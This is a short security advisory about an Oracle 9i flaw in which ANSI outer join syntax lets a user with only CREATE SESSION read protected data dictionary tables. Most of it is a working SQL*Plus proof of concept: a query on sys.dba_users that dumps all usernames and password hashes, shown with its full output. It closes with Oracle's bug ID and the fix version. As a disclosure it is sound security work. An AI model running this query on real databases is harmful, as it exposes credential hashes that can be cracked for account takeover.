COMMAND
	Oracle ANSI outer join syntax allows access to any data for basic user
SYSTEMS AFFECTED
	Oracle 9i
PROBLEM
	In Pete Finnigan [www.pentest-limited.com] advisory :
	Oracle 9i  includes  the  new  ANSI  outer  join  syntax.  Oracle  still
	supports the old syntax but  in  the  new  syntax  there  is  a  serious
	security issue that allows any user to view any data.
	here is an example:
	 
	SQL*Plus: Release 9.0.1.0.1 - Production on Tue Apr 16 15:16:45 2
	(c) Copyright 2001 Oracle Corporation.  All rights reserved.
	Connected to:
	Oracle9i Enterprise Edition Release 9.0.1.1.1 - Production
	With the Partitioning option
	JServer Release 9.0.1.1.1 - Production
	SQL> connect / as sysdba
	Connected.
	SQL> CREATE USER us1 IDENTIFIED BY us11;
	User created.
	SQL> Grant Create Session to us1;
	Grant succeeded.
	SQL> connect us1/us11;
	Connected.
	SQL> select a.username, a.password
	  2  from sys.dba_users a left outer join sys.dba_users b on
	  3  b.username = a.username
	  4  ;
	USERNAME                       PASSWORD
	------------------------------ ------------------------------
	SYS                            D4C5016086B2DC6A
	SYSTEM                         D4DF7931AB130E37
	DBSNMP                         E066D214D5421CCC
	AURORA$JIS$UTILITY$            INVALID_ENCRYPTED_PASSWORD
	OSE$HTTP$ADMIN                 INVALID_ENCRYPTED_PASSWORD
	AURORA$ORB$UNAUTHENTICATED     INVALID_ENCRYPTED_PASSWORD
	SCOTT                          F894844C34402B67
	US1                            491AB9AB94D8A9EF
	OUTLN                          4A3BA55E08595C81
	ORDSYS                         7EFA02EC7EA6B86F
	OLAPSVR                        AF52CFD036E8F425
	USERNAME                       PASSWORD
	------------------------------ ------------------------------
	OLAPSYS                        3FB8EF9DB538647C
	ORDPLUGINS                     88A2B2C183431F00
	MDSYS                          72979A94BAD2AF80
	CTXSYS                         71E687F036AD56E5
	WKSYS                          69ED49EE1851900D
	OLAPDBA                        1AF71599EDACFB00
	QS_CBADM                       7C632AFB71F8D305
	QS_ADM                         991CDDAD5C5C32CA
	QS                             8B09C6075BDF2DC4
	QS_WS                          24ACF617DD7D8F2F
	HR                             6399F3B38EDF3288
	USERNAME                       PASSWORD
	------------------------------ ------------------------------
	OE                             9C30855E7E0CB02D
	PM                             72E382A52E89575A
	SH                             9793B3777CD3BD1A
	QS_ES                          E6A6FA4BB042E3C2
	QS_OS                          FF09F3EB14AE5C26
	RMAN                           E7B5D92911C831E1
	QS_CB                          CF9CFACF5AE24964
	QS_CS                          91A00922D8C0F146
	30 rows selected.
	SQL> 
	
	This shows that a user  with  the  barest  of  privileges,  i.e.  CREATE
	SESSION can actually see data in the data dictionary that should not  be
	seen. In this example we can select the  list  of  usernames  and  their
	hashes.
SOLUTION
	Oracle assigned bug ID 2121935 to the issue.
	Its marked as fixed in version 9.2  and  will  not  be  back  ported  to
	earlier versions of Oracle.